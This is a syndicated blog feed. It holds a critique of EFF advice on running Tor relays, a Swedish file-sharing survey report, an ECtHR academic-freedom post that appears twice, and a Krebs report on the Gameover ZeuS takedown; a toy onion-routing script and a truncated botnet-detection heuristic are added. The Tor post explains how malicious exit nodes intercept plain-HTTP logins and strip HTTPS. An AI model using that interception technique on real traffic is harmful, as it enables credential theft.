Tor nodes are run by volunteers, and there is no vetting involved. If you want to run a Tor node, you can. If you want to be an exit node, that’s allowed. And if you want to watch all traffic that leaves your exit node, there’s nothing stopping you. In the case with the Swedish researchers, they found some nodes that were intentionally altering the data that you wanted to receive.

I’d say that this is earth-shattering news, except that it isn’t. This type of exploit has been reported in 2012, and 2011 (with sample code), and pretty much every year since Tor started.

Back in 2007, one Swedish guy ran a Tor exit node and was capturing login credentials. Among other things, he saw login credentials to embassies all over the world.

You are… The Weakest Link!

At this point, Tor is only as secure as your connection to the server. If you use HTTP over Tor and you do anything that identifies yourself (fill out a form that requires your name, enter your email address, log in to a service, check Facebook, do an ego-search to see who is talking about you…) then you’ve just compromised any security that Tor was providing. Someone watching the network traffic will know it was you.

Using something like HTTPS-Everywhere can help a little: it stops you from forgetting to use HTTPS for sites that support it. That matters because the practical attack from an exit node is not breaking TLS but keeping you off it. An exit that sees you start a session over plain HTTP can strip the redirect to HTTPS and serve the login page itself; if you do reach HTTPS, all it can present is a certificate for the site that your browser will not trust, and the attack then depends on you clicking through the warning. Virtually nobody uses HTTPS with client-side certificates, and without them the server has no way to tell your browser from an exit node’s proxy that is relaying your session. (For the attacker, you don’t sit and wait for “Neal” to log in. You hijack everyone and eventually you’ll also catch “Neal”.) Anyone smart enough to configure a Tor exit node and monitor its traffic is certainly able to run this kind of hijack; the stripping tools are public, and any beginner admin can learn to set them up in a few hours.
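As an added example (not code from the Tor Project or from Hacker Factor), here is a toy three-hop onion circuit that makes the two points above concrete: each relay strips one layer and learns only the next hop, while the exit relay, holding the innermost layer, forwards exactly the bytes the client sent, so a plain-HTTP login is readable there and a TLS-protected one is not. The relay names, keys, bank hostname and HTTP request are constructed; keys are pre-shared here rather than negotiated, and the cipher is a throwaway HMAC keystream that stands in for Tor's real cell encryption.

```python
"""Toy three-hop onion circuit showing what each relay can observe.

Added example; this is not Tor's protocol or code. Keys are pre-shared here
(Tor negotiates them with a handshake), the "cipher" is an unauthenticated
HMAC-SHA256 keystream, and every name, key and request below is constructed.
Do not reuse this cipher for anything real.
"""
import hashlib
import hmac
import json


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """XOR data with an HMAC-SHA256 counter keystream (toy, symmetric, unauthenticated)."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


# Constructed circuit: the client shares one key with each relay.
RELAY_KEYS = {
    "guard": b"guard-key-constructed",
    "middle": b"middle-key-constructed",
    "exit": b"exit-key-constructed",
}
CIRCUIT = ["guard", "middle", "exit"]


def build_onion(destination: str, payload: bytes) -> bytes:
    """Wrap payload in one layer per relay; the exit's layer is innermost."""
    blob = json.dumps({"next": destination, "data": payload.hex()}).encode()
    blob = keystream_xor(RELAY_KEYS["exit"], blob)
    for relay in reversed(CIRCUIT[:-1]):  # middle, then guard
        next_hop = CIRCUIT[CIRCUIT.index(relay) + 1]
        blob = json.dumps({"next": next_hop, "data": blob.hex()}).encode()
        blob = keystream_xor(RELAY_KEYS[relay], blob)
    return blob


def relay_process(name: str, blob: bytes):
    """A relay peels its own layer: it learns the next hop and gets an opaque blob."""
    layer = json.loads(keystream_xor(RELAY_KEYS[name], blob))
    return layer["next"], bytes.fromhex(layer["data"])


def run_circuit(destination: str, payload: bytes):
    """Push the onion through the circuit; return each relay's view and the final bytes."""
    observations = {}
    blob = build_onion(destination, payload)
    hop = CIRCUIT[0]
    while hop in CIRCUIT:
        next_hop, blob = relay_process(hop, blob)
        # 'forwarded' is what leaves this relay on the wire: ciphertext for
        # guard and middle, the client's actual payload for the exit.
        observations[hop] = {"next_hop": next_hop, "forwarded": blob}
        hop = next_hop
    return observations, blob


# Constructed login over plain HTTP, and a key standing in for a TLS session.
HTTP_REQUEST = (b"POST /login HTTP/1.1\r\nHost: bank.example\r\n\r\n"
                b"user=neal&password=hunter2")
SERVER_KEY = b"tls-session-key-constructed"


def relays_seeing(secret: bytes, observations) -> list:
    """Which relays forwarded bytes that contain the secret in the clear."""
    return [r for r, obs in observations.items() if secret in obs["forwarded"]]


def demo():
    """Return (relays that see the password over HTTP, same over 'HTTPS')."""
    obs_http, _ = run_circuit("bank.example", HTTP_REQUEST)
    # With TLS the exit forwards ciphertext it holds no key for.
    obs_tls, _ = run_circuit("bank.example", keystream_xor(SERVER_KEY, HTTP_REQUEST))
    secret = b"password=hunter2"
    return relays_seeing(secret, obs_http), relays_seeing(secret, obs_tls)


if __name__ == "__main__":
    print(demo())
```

Over plain HTTP the exit, and only the exit, ends up holding the password and the destination hostname; over the simulated TLS session it still learns the destination but forwards bytes it cannot read. Because the exit forwards the plaintext in the HTTP case, it can also rewrite it before sending it on, which is the tampering the Swedish researchers reported. What the toy does not model is the stripping attack described above, where the exit keeps the user on HTTP in the first place.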

Run or Run Away

In their tweet, the EFF recommends that people run their own Tor relays. This will make the mixer network larger and makes tracking network traffic more difficult. However, what does it do for privacy and to your network traffic?

  • Tor consumes network bandwidth. I hope you have a high-speed network connection, because most residential users can either run a Tor relay or watch NetFlix, but you won’t have enough bandwidth for both.

  • Tor has entry, middle, and exit nodes. Someone on an entry node can see you enter the network, but not where you are going. An exit node can see where you go and what you are doing, but not where the request came from. Meanwhile, a middle node sees anonymous traffic coming in and anonymous traffic going out. (Until I learn of an exploit, the middle nodes are safe enough.) If you run an exit node, then you can observe all network traffic between the outside world and your exit node. And you have the ability to interfere with network traffic.

    As a Tor user, you don’t know who owns the exit nodes or what they are doing. “Assuming” it is safe does not make it safe.

  • As an exit node, you cannot control where people go or what they want to download. If they download child porn, then it will look to the omnipotent network gods as if you (the owner of the exit node) downloaded child porn. (Better leave the front door unlocked since it’s expensive to repair a kicked-in door after the police arrive.)
  • My contract with my Internet Service Provider (ISP) explicitly forbids me from sharing my network connection with other people outside my home. I cannot legally run a free WiFi access point for my neighbors or even run a public web service. That’s the same with most residential ISPs. The EFF’s suggestion for you to run a Tor node will likely be in violation of your ISP service agreement. (You’re running a network service and permitting the world to use your network connection.)

What my client meant to say…

Perhaps the EFF meant to tell people to use Tor and misspoke when they said to run a Tor relay… In that case, there are still two issues: speed and security. With regards to speed, Tor is really slow on its good days.

But then there is that pesky exit-node issue. Without Tor, I can connect to my bank from my home. I can be fairly confident that nobody is intercepting or hijacking the connections, and it is as safe as HTTPS (without client-certs) allows. But with Tor, I cannot trust the exit nodes. HTTPS will not notify me if the initial connection is hijacked and the exit node has a great opportunity for hijacking the connection.

Moreover, Tor nodes are run by volunteers all over the Internet. I have no idea who they are, what networks my login credentials are passing over, or who might be watching. As far as I know, there is no way to identify all of the networks that my packets touch. While I do use Tor for anonymous network access, I would never trust it in its current state for anything that requires identifiable information.

For more specific paranoia, consider this: If I connect directly from my home to my bank, I can use traceroute and identify that my packets never leave this country. Yes, corporations that run the networks may see my traffic, but I don’t have to worry about foreign governments. In contrast, if I use Tor and it randomly selects an exit node in Taiwan, then governments in Taiwan, China, Europe, and every other country can spy on my connection as the packets leave a distant Tor exit node and connect to my local bank. With Tor, there are a lot more options for people to watch my online activities and hijack the connection. Without Tor, I only have to worry about my local networks.

Focal Points

I typically trust the EFF’s judgment. Their legal advice and concerns about privacy, security, and technology are usually spot-on. And when the EFF speaks, people should listen.

However, as with anyone else, their suggestions are not always 100% reliable. Forcing people to use HTTPS on an HTTP-only service breaks access to the service. Releasing an HTTPS-Everywhere rule without testing it first seems like a really bad idea, and not patching it when told that the rule does not work seems willfully ignorant. And while I agree that we need a more secure version of the Internet, Tor is not the solution. Advising people to run a Tor node without identifying the impact and risks seems like a huge mistake to me.

Perhaps I am just over-reacting. But it seems to me that the EFF just gave out some very bad advice.

TorrentFreak: Young Swedes Who Never File-Share Up By 40%

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Sweden has long been a central figure in the file-sharing phenomenon, not least due to its associations with The Pirate Bay. As a result, for more than ten years sharing files has been a popular pastime with many young Swedes, much to the disappointment of the world’s largest entertainment companies.

The Cybernorms research group at Lund University in Sweden has been in the news several times during the past few years as a result of its work with The Pirate Bay. On more than one occasion the infamous torrent site has renamed itself The Research Bay in order for researchers to collect information on the values, norms and conceptions of the file-sharing community.

Cybernorms have now revealed more of their findings which suggest that after years of escalation, online sharing by those in the 15-24 year-old bracket could be in decline.

Survey responses from around 4,000 individuals suggest that the number of active file-sharers has dropped in the past two years. The share of those who exchange files daily or almost daily has decreased from 32.8 percent in 2012 to 29 percent in 2014.

“It is a small but significant decrease,” Måns Svensson, head of Cybernorms at Lund University told SVT.

Perhaps the most interesting aspect of the decrease is the mechanism through which it was encouraged. Historically, entertainment industry scare tactics have been employed to try to reduce unauthorized sharing, but the researchers believe something much more positive is responsible.

“What is interesting is that this is the first time we have been able to see that file-sharing has gone down but without that being associated with a conviction, such as the Pirate Bay ruling,” Svensson says.

“If you listen to what young people themselves are saying, it is new and better legal services that have caused the decrease in file-sharing, rather than respect for the law. There has been a trend where alternative legal solutions such as Spotify and Netflix are changing consumption patterns among young people.”

Also of interest is the apparent effect on up-and-coming youngsters who might otherwise have begun file-sharing themselves. The researchers found that between 2009 and 2013 the percentage of young people who never share files illegally increased from 21.6 percent to 30.2 percent, a boost of well over a third.

Interestingly, in that same four-year period, the percentage of young people who said they believe that people should not share files because it is illegal dropped from 24 percent to 16.9 percent. So, even while young people are sharing files less often, their acceptance of the standards presented by the law appears to be dropping too.

In this case it does indeed appear that the carrot is mightier than the stick.



[Медийно право] [Нели Огнянова]: ECtHR: on academic freedom and the right to criticise court decisions

This post was syndicated from: [Медийно право] [Нели Огнянова] and was written by: nellyo. Original post: at [Медийно право] [Нели Огнянова]


Boyko Boev (Sofia University, 2000, and Columbia University School of Law, New York, 2004) is a lawyer and senior legal officer at Article 19. He specialises in media regulation, public service media, defamation and transparency of media ownership. He has analysed the media laws of around 20 countries in Europe, the Middle East, Africa and Asia for their compliance with international law and freedom-of-expression standards. He has experience as a human rights lawyer.


*

On 27 May 2014 the Second Section of the European Court of Human Rights gave judgment in Mustafa Erdoğan and Others v Turkey, a case concerning academic freedom and the right to criticise court decisions. The judgment explains the relationship between “academic freedom” and “freedom of expression” and stresses that academic freedom enjoys the highest level of protection even when opinions are shared with the general public. Although the Court again emphasised that protecting the reputation of judges is important for the functioning of the rule of law, in this case it upheld the right of a professor of constitutional law to express the opinion that Turkey’s constitutional judges are incompetent and politically dependent.

The case

The application to Strasbourg was lodged by a Turkish professor of constitutional law and by the editor and publisher of a journal, who complained of having been found liable for defamation and insult. The trigger was an article by the professor criticising the Constitutional Court’s decision to dissolve the Virtue Party.
Recall that the party had been represented in parliament in the late 1990s. Since it was Islamist, its participation in politics was perceived as a challenge to the secular foundations of the Turkish state. Some statements by its members, and the refusal of its deputy chairwoman to sit in parliament without a headscarf, provoked a strong public reaction.

In 2001, at the request of the prosecution, the Constitutional Court dissolved the party and restricted the right of some of its members to take part in political life, finding a conflict with the constitutional provisions that protect the secular character of the state.
The Constitutional Court’s decision, which the public had been awaiting eagerly for several years, prompted wide discussion. The professor of constitutional law joined this debate with an article criticising the decision on legal and political grounds, citing among other things the case law of the European Court. After the publication, all of the constitutional judges brought a civil action against the author, the editor and the publisher of the journal, claiming that the article had injured their honour and dignity as judges.
The first-instance court in Ankara found that the constitutional judges’ right to reputation had been violated, pointing to passages in the article in which the author spoke of pressure on the court from the Turkish military and questioned the judges’ professional qualities and intellectual capacity. The defendants were ordered to pay damages. The judgment was upheld by the appellate court.

The judgment

The European Court finds that there was an interference with the applicants’ right to freedom of expression, that it was prescribed by law and that it pursued a legitimate aim, namely the protection of the reputation and rights of others.
The question the judges examine is whether the interference was “necessary in a democratic society”. The Court points out that freedom of expression is one of the essential foundations of a democratic society and one of the basic conditions for its progress and for each individual’s self-fulfilment. The right applies to ideas and information that offend, shock or disturb. The Court stresses that a distinction must be drawn between statements of fact and value judgments. While acknowledging the national authorities’ margin of appreciation, the European judges examine whether those authorities struck a fair balance between the right to freedom of expression and the right to reputation.

The Court notes that the criteria for balancing the two rights were set out in Axel Springer AG v Germany. The relevant factors are:

1.) does the speech contribute to a debate of public interest?

2.) how well known is the person concerned and what is the subject of the publication?

3.) what was the prior conduct of the person concerned?

4.) how was the information obtained and was it verified?

5.) what are the content, form and consequences of the publication?

6.) how severe is the sanction imposed?
The Court finds that the subject of the publication, the functioning of the judicial system, is a matter of public interest. The article contributes to an existing public debate. The rights affected are those of judges whose professional competence and independence have been called into question. At the same time, the Court notes that the author of the publication is a professor of law and as such was exercising his academic freedom. The Court states:
“. . . [A]cademic freedom in research and in training should guarantee freedom of expression and of action, freedom to disseminate information and freedom to conduct research and distribute knowledge and truth without restriction. . . . The Court’s case law therefore requires any restriction to be subjected to careful and critical scrutiny. . . . This freedom, however, is not restricted to academic or scientific research, but also extends to the academics’ freedom to express freely their views and opinions, even if controversial or unpopular, in the areas of their research, professional expertise and competence. This may include an examination of the functioning of public institutions in a given political system, and a criticism thereof.” [para. 40]
The Court accepts that the limits of acceptable criticism of the official acts of members of the judiciary are wider than for ordinary citizens. At the same time, given the importance of the courts in a state governed by the rule of law, they must be protected from unfounded attacks. The Court notes that a distinction must be drawn between criticism and insult. Analysing the expressions used, the European judges accept that they could be perceived as offensive, but at the same time find that they are value judgments resting on facts, namely the analysis of the Constitutional Court’s decision.
The Court finds that the national courts did not distinguish between statements of fact and value judgments, and did not assess whether the applicants had acted in keeping with their duties and responsibilities and whether the article had been published in good faith. They did not examine the expressions in question in their context, the ban on the Virtue Party and the heated debate that followed it, and so failed to assess properly the stylistic features of the speech. The Court does not find that there was a gratuitous personal attack on the judges. In view of this, the European judges conclude that there were insufficient grounds for holding that the interference with freedom of expression was necessary in a democratic society, and find a violation of Article 10 of the Convention.
Judges Sajó, Vučinić and Kūris delivered a separate opinion. In their view, the majority did not clarify the concept and principles of academic freedom. They note that the right to academic freedom does not concern only debate in scholarly publications, debate within educational institutions and teaching. Since the right is protected by Article 10 of the Convention, it covers both the opinions that academics exchange among themselves and those they share with the general public.
The judges acknowledge that the level of protection of academic freedom, particularly as regards its expression before the general public, cannot be fully explained by any of the familiar justifications for protecting freedom of expression. The meaning, basis and scope of academic freedom as a legal concept are not settled, although it is traditionally seen as an important element of university autonomy and of the autonomy of scholars.
According to these judges, guaranteeing academic freedom to share opinions with the general public is warranted not only by the needs of a democratic society but also for the sake of the development of knowledge and science. The three judges state:

There is no “Chinese wall” between science and a democratic society. On the contrary, there is no democratic society without free science and free scholars. This interrelationship is particularly strong in the context of the social sciences and law, where academic discourse helps inform the public about matters that concern it, including those bearing directly on government and politics. . . . In principle, the contribution of social and legal scholarship to public debate, and the opinions that academics share with the general public on the basis of their research, professional knowledge and competence, call for the highest level of protection under Article 10.

The judges consider that the protection of freedom of expression depends on whether there is an “academic element” in the comments or statements that affect personal rights. Since the European Court has not so far ruled on how to determine whether a case involves the exercise of academic freedom or of freedom of expression, the three judges propose an assessment test. It comprises the following elements: (a) was the statement made by an academic?; (b) do the statements relate to that person’s research?; (c) are the conclusions or opinions based on the person’s professional knowledge and competence? If these conditions are met, the contested statement enjoys the highest level of protection under Article 10. Where and how the statement was made is of secondary importance and is sometimes not decisive at all.
The three judges attach weight to the fact that the statements were made by a professor of constitutional law in his scholarly analysis of a Constitutional Court decision. The professor expressed his opinion about the character of some of the judges on the basis of his professional analysis. In the judges’ view this is an informed opinion, not in the sense that it is factually correct, but because it rests on research and facts. The national courts erred in not taking these features into account when analysing the proportionality of the interference.

Comment

The European Court develops the concept of academic freedom further, holding that this freedom covers not only the exchange of opinions among academics but also cases where academics share their professional opinion with the general public. All of the judges agree that academic freedom enjoys the highest level of protection under Article 10. The separate opinion of three of the judges proposes a test for distinguishing academic freedom from freedom of expression.
Although the Court refers to the Axel Springer AG v Germany test for balancing the right to freedom of expression against the right to reputation, analysis of the judgment shows that the emphasis is on the nature of the speech rather than on the elements of that test. If the speech is an expression of academic freedom, the Court considers that the balance between freedom of expression and the right to reputation tilts towards the former. Where there is a value judgment, what matters for the Court is whether it rests on facts. In that sense the judgment confirms the test from Lingens v Austria.
As regards academic freedom, the Court’s references deserve mention: Recommendation CM/Rec(2012)7 of the Committee of Ministers of the Council of Europe on the responsibility of public authorities for academic freedom and institutional autonomy; Recommendation R (2000) 8 of the Committee of Ministers of the Council of Europe on the research mission of universities; and Recommendation 1762 (2006) of the Parliamentary Assembly of the Council of Europe on academic freedom and university autonomy.
It is worth noting that academic freedom is guaranteed by Article 13 of the Charter of Fundamental Rights of the European Union, which, unlike Article 10 of the Convention, expressly protects freedom of the arts and sciences: “The arts and scientific research shall be free of constraint. Academic freedom shall be respected.”

Изследване на понятието и значението на академичната свобода вижте също:
J. VRIELINK, P. LEMMENS, S. PARMENTIER and the LERU working group on Human Rights, Academic Freedom as a Fundamental Right

League of European Research Universities, Leuven, 2010.


 

Материалът е предоставен от автора за блога Медийно право.

Боев, Б. ЕСПЧ: за академичната свобода и правото да се критикуват решения на съда. (2 юни 2014). в: Медийно право:  https://nellyo.wordpress.com/2014/06/02/echr-15/




[Медийно право] [Нели Огнянова]: ECtHR: on academic freedom and the right to criticise court decisions

This post was syndicated from: [Медийно право] [Нели Огнянова] and was written by: nellyo. Original post: at [Медийно право] [Нели Огнянова]


Boyko Boev (Sofia University, 2000, and Columbia University School of Law, New York, 2004) is a lawyer and senior expert at Article 19. He specialises in media regulation, public service media, defamation and transparency of media ownership. He has analysed the media laws of around 20 countries in Europe, the Middle East, Africa and Asia for their compliance with international law and freedom of expression standards. He also has experience as a human rights lawyer.


*

On 27 May 2014 the Second Section of the European Court of Human Rights delivered its judgment in Mustafa Erdoğan and Others v Turkey, a case concerning academic freedom and the right to criticise court decisions. The judgment explains the relationship between "academic freedom" and "freedom of expression" and stresses that "academic freedom" enjoys the highest level of protection even when opinions are shared with the wider public. Although the Court again emphasised that protecting the reputation of judges is important for the functioning of the rule of law, in this case it upheld the right to an opinion of a professor of constitutional law who considers the constitutional judges in Turkey incompetent and politically dependent.

The case

The application in Strasbourg was lodged by a Turkish professor of constitutional law and by the editor and publisher of a journal, who complained of their conviction for defamation and insult. The trigger was an article by the professor criticising the Constitutional Court's decision to dissolve the Virtue Party.
Recall that the party in question was represented in parliament in the late 1990s. Because it was Islamist, its participation in politics was perceived as a challenge to the secular foundations of the Turkish state. Some statements by its members, and the refusal of its deputy chair to sit in parliament without a headscarf, provoked a strong public reaction.

In 2001, at the request of the prosecution, the Constitutional Court dissolved the party and restricted the right of some of its members to take part in political life, finding conflicts with the constitutional provisions that protect secular government in the country.
The Constitutional Court's decision, which the public had awaited eagerly for several years, provoked wide discussion. The professor of constitutional law joined this debate by writing an article criticising the decision, setting out legal and political arguments, including references to the case law of the European Court. After publication, all the constitutional judges brought a civil action against the author, the editor and the publisher of the journal, claiming that the article had damaged their honour and dignity as judges.
The first-instance court in Ankara found that the constitutional judges' right to reputation had been violated, pointing to parts of the article in which the author speaks of pressure on the court from the Turkish military and questions the judges' professional qualities and intellectual capacity. The defendants were ordered to pay damages. The judgment was upheld by the appellate court.

Judgment

The European Court finds that there was an interference with the applicants' right to freedom of expression, that it was prescribed by law and that it pursued a legitimate aim: the protection of the reputation and rights of others.
The question the judges examine is whether the interference was "necessary in a democratic society". The Court points out that freedom of expression is one of the essential foundations of a democratic society and one of the basic conditions for its progress and for each individual's self-fulfilment. The right applies to ideas and information that offend, shock or disturb. The Court stresses that a distinction must be made between statements of fact and value judgments. While acknowledging the national authorities' margin of appreciation, the European judges examine whether those authorities struck a fair balance between the right to freedom of expression and dignity.

The Court notes that the criteria for balancing the two rights were established in Axel Springer AG v Germany. The relevant factors are:

1.) does the speech contribute to a debate of public interest?

2.) how well known is the person concerned, and what is the subject of the publication?

3.) what was the prior conduct of the person concerned?

4.) how was the information obtained, and how was it verified?

5.) what are the content, form and consequences of the publication?

6.) how severe is the sanction imposed?
The Court finds that the subject of the publication, the functioning of the judicial system, is of public interest. The article contributes to an existing public debate. The rights affected are those of judges whose professional competence and independence are called into question. At the same time, the Court notes that the author of the publication is a professor of law and as such was exercising his academic freedom. The Court states:
". . . [A]cademic freedom in research and in training should guarantee freedom of expression and of action, freedom to disseminate information and freedom to conduct research and distribute knowledge and truth without restriction. . . . The Court's case law therefore requires any restriction to be subjected to careful and critical scrutiny. . . This freedom, however, is not restricted to academic or scientific research, but also extends to the academics' freedom to express freely their views and opinions, even if controversial or unpopular, in the areas of their research, professional expertise and competence. This may include an examination of the functioning of public institutions in a given political system, and a criticism thereof." [para. 40]
The Court accepts that the scope for criticism of the official acts of members of the judiciary is wider than for ordinary citizens. At the same time, given the importance of the courts in a state governed by the rule of law, they must be protected from unfounded attacks. The Court notes that a distinction must be drawn between criticism and insult. Analysing the expressions used, the European judges accept that they could be perceived as offensive, but at the same time find that they are value judgments based on facts, namely the analysis of the Constitutional Court's decision.
The Court finds that the national courts did not distinguish between statements of fact and value judgments, and did not assess whether the applicants had acted in accordance with their duties and responsibilities and whether the article was published in good faith. They did not examine the expressions in their context, the banning of the Virtue Party and the heated debate that followed it, and thus failed to assess properly the stylistic features of the speech. The Court does not find that there was a gratuitous personal attack on the judges. In view of this, the European judges conclude that there were insufficient grounds to consider the interference with freedom of expression necessary in a democratic society, and hold that there has been a violation of Article 10 of the Convention.
Judges Sajó, Vučinić and Kūris delivered a separate opinion. In their view, the majority did not clarify the concept and principles of academic freedom. They note that the right to academic freedom is not confined to debates in scholarly publications, debates within educational institutions and teaching. Since this right is protected by Article 10 of the Convention, it covers both the opinions academics exchange among themselves and those they share with the wider public.
The judges acknowledge that the degree of protection of academic freedom, especially as regards its expression to the wider public, cannot be fully explained by any of the known rationales for protecting freedom of expression. The meaning, basis and scope of academic freedom as a legal concept have not been settled, although it is traditionally regarded as an important element of university autonomy and the autonomy of scholars.
According to these judges, guaranteeing academic freedom to share opinions with the wider public is driven not only by the needs of a democratic society but also by the advancement of learning, knowledge and science. The three judges state:

There is no "Chinese wall" between science and a democratic society. On the contrary, there is no democratic society without free science and free scholars. This interrelationship is particularly strong in the context of the social sciences and law, where scholarly discourse helps inform society on matters that concern it, including those that relate directly to government and politics. . . As a matter of principle, the contribution of social and legal research to public debate, and the opinions that academics share with the wider public on the basis of their research, professional expertise and competence, require the highest level of protection under Article 10.

The judges consider that the protection of freedom of expression depends on whether there is an "academic element" in the comments or statements that affect personal rights. Since the European Court has not so far ruled on how to determine whether a case concerns the exercise of academic freedom or freedom of expression, the three judges propose a test. It comprises the following elements: (a) was the statement made by an academic? (b) does the statement relate to the person's research? (c) are the conclusions or opinions based on the person's professional expertise and competence? If these conditions are met, the contested statement enjoys the highest protection under Article 10. Where and how the statement was made is of secondary, supplementary importance, and is sometimes not decisive at all.
The three judges attach importance to the fact that the statements were made by a professor of constitutional law in his scholarly analysis of a Constitutional Court decision. The professor expressed his opinion about the character of certain judges on the basis of his professional analysis. According to the judges, this is an informed opinion: not in the sense that it is factually correct, but because it rests on research and facts. The national courts erred by failing to take these features into account when analysing the proportionality of the interference.

Comment

The European Court develops the concept of academic freedom further, accepting that this freedom applies not only to the exchange of opinions among academics but also to cases in which academics share their professional opinion with the wider public. All the judges take the view that academic freedom enjoys the highest protection under Article 10. The opinion of three of the judges proposes a test for distinguishing academic freedom from freedom of expression.
Although the Court refers to the balancing test from Axel Springer AG v Germany for weighing the right to freedom of expression against the right to reputation, an analysis of the judgment shows that the emphasis is on the nature of the speech rather than on the elements of that test. If the speech is an expression of academic freedom, the Court considers that the balance between the right to freedom of expression and the right to reputation tips towards the former. Where a value judgment is at issue, what matters to the Court is whether it rests on facts. In this sense the test from Lingens v Austria is reaffirmed.
On academic freedom, the Court's references deserve mention: Recommendation CM/Rec(2012)7 of the Committee of Ministers of the Council of Europe on the responsibility of public authorities for academic freedom and institutional autonomy; Recommendation R (2000) 8 of the Committee of Ministers of the Council of Europe on the research mission of universities; and Recommendation 1762 (2006) of the Parliamentary Assembly of the Council of Europe on academic freedom and university autonomy.
It is worth noting that academic freedom is guaranteed by Article 13 of the Charter of Fundamental Rights of the European Union, which, unlike Article 10 of the Convention, expressly protects freedom of the arts and sciences: "The arts and scientific research shall be free of constraint. Academic freedom shall be respected."

For a study of the concept and significance of academic freedom, see also:
J. VRIELINK, P. LEMMENS, S. PARMENTIER and the LERU working group on Human Rights, Academic Freedom as a Fundamental Right

League of European Research Universities, Leuven, 2010.


 

The material was provided by the author for the Медийно право (Media Law) blog.

Boev, B. ECtHR: on academic freedom and the right to criticise court decisions. (2 June 2014). In: Медийно право: http://nellyo.wordpress.com/2014/06/02/echr-15/




Krebs on Security: ‘Operation Tovar’ Targets ‘Gameover’ ZeuS Botnet, CryptoLocker Scourge

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The U.S. Justice Department is expected to announce today an international law enforcement operation to seize control over the Gameover ZeuS botnet, a sprawling network of hacked Microsoft Windows computers that currently infects an estimated 500,000 to 1 million compromised systems globally. Experts say PCs infected with Gameover are being harvested for sensitive financial and personal data, and rented out to an elite cadre of hackers for use in online extortion attacks, spam and other illicit moneymaking schemes.

This graphic, from 2012, shows the decentralized nature of P2P network connectivity of 23,196 PCs infected with Gameover. Image: Dell SecureWorks

The sneak attack on Gameover, dubbed “Operation Tovar,” began late last week and is a collaborative effort by investigators at the FBI, Europol, and the UK’s National Crime Agency; security firms CrowdStrike, Dell SecureWorks, Symantec, Trend Micro and McAfee; and academic researchers at VU University Amsterdam and Saarland University in Germany. News of the action first came to light in a blog post published briefly on Friday by McAfee, but that post was removed a few hours after it went online.

Gameover is based on code from the ZeuS Trojan, an infamous family of malware that has been used in countless online banking heists. Unlike ZeuS — which was sold as a botnet creation kit to anyone who had a few thousand dollars in virtual currency to spend — Gameover ZeuS has since October 2011 been controlled and maintained by a core group of hackers from Russia and Ukraine.

Those individuals are believed to have used the botnet in high-dollar corporate account takeovers that frequently were punctuated by massive distributed-denial-of-service (DDoS) attacks intended to distract victims from immediately noticing the thefts. According to the Justice Department, Gameover has been implicated in the theft of more than $100 million in account takeovers.

The curators of Gameover also have reportedly loaned out sections of their botnet to vetted third-parties who have used them for a variety of purposes. One of the most popular uses of Gameover has been as a platform for seeding infected systems with CryptoLocker, a nasty strain of malware that locks your most precious files with strong encryption until you pay a ransom demand.

According to a 2012 research paper published by Dell SecureWorks, the Gameover Trojan is principally spread via Cutwail, one of the world’s largest and most notorious spam botnets (for more on Cutwail and its origins and authors, see this post). These junk emails typically spoof trusted brands, including shipping and phone companies, online retailers, social networking sites and financial institutions. The email lures bearing Gameover often come in the form of an invoice, an order confirmation, or a warning about an unpaid bill (usually with a large balance due to increase the likelihood that a victim will click the link). The links in the email have been replaced with those of compromised sites that will silently probe the visitor’s browser for outdated plugins that can be leveraged to install malware.

It will be interesting to hear how the authorities and security researchers involved in this effort managed to gain control over the Gameover botnet, which uses an advanced peer-to-peer (P2P) mechanism to control and update the bot-infected systems.

The infection and peer-to-peer (P2P) communication mechanism of Gameover ZeuS. Image: Abuse.ch

The addition of the P2P component in Gameover is an innovation designed to make it much more difficult for security experts, law enforcement or other Internet do-gooders to dismantle the botnet. In March 2012, Microsoft used a combination of legal maneuvering and surprise to take down dozens of botnets powered by ZeuS (and its code-cousin, SpyEye) by seizing control over the domain names that the bad guys used to control the individual ZeuS botnets.

But Gameover would be far trickier to disrupt or wrest from its creators: It uses a tiered, decentralized system of intermediary proxies and strong encryption to hide the location of servers that the botnet masters use to control the crime machine.

“Microsoft’s 2012 takedown action had no effect on the P2P version of ZeuS because of its network architecture,” reads Dell SecureWorks’s 2012 paper on Gameover. “In the P2P model of ZeuS, each infected client maintains a list of other infected clients. These peers act as a massive proxy network between the P2P ZeuS botnet operators and the infected hosts. The peers are used to propagate binary updates, to distribute configuration files, and to send stolen data to the controllers.”
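The architecture described above (every bot keeps its own peer list and relays traffic through other bots rather than a few seizable domains) shows up in network telemetry as unusual fan-out, which is one thing a defender can measure. The script below is an added example, not code from Krebs on Security or the Dell SecureWorks paper; it applies that heuristic to constructed NetFlow-style records, and all addresses, ports and thresholds are assumed for illustration.

```python
"""Heuristic for spotting peer-to-peer botnet behaviour in flow telemetry.

Added example, not code from Krebs on Security or Dell SecureWorks. A P2P bot
keeps its own list of other infected hosts and exchanges updates, configuration
and stolen data with many of them directly, usually on arbitrary high ports. A
centralised bot, like an ordinary client, talks to a handful of servers on
well-known ports. That difference in fan-out is what this script measures.
All addresses (RFC 5737 documentation ranges), ports and thresholds are
constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """One summarised connection record (NetFlow-style), constructed here."""
    src: str    # internal host that opened the connection
    dst: str    # remote address it talked to
    dport: int  # remote port
    proto: str  # "tcp" or "udp"


# Constructed sample: 10.0.0.5 behaves like an ordinary workstation, 10.0.0.6
# like a bot beaconing to a single controller (the model that domain seizure
# can disrupt), and 10.0.0.9 like a node in a decentralised P2P botnet.
SAMPLE_FLOWS = (
    [Flow("10.0.0.5", "192.0.2.10", 443, "tcp")] * 20
    + [Flow("10.0.0.5", "192.0.2.20", 443, "tcp")] * 10
    + [Flow("10.0.0.5", "192.0.2.30", 80, "tcp")] * 5
    + [Flow("10.0.0.6", "203.0.113.77", 443, "tcp")] * 40
    + [Flow("10.0.0.9", f"198.51.100.{10 + i}", 20000 + 97 * i, "udp") for i in range(15)]
    + [Flow("10.0.0.9", f"203.0.113.{50 + i}", 30000 + 53 * i, "udp") for i in range(10)]
)


def host_profiles(flows):
    """Aggregate per-source statistics: distinct peers, distinct remote ports,
    and the share of flows going to well-known ports (< 1024) or over UDP."""
    peers, ports = defaultdict(set), defaultdict(set)
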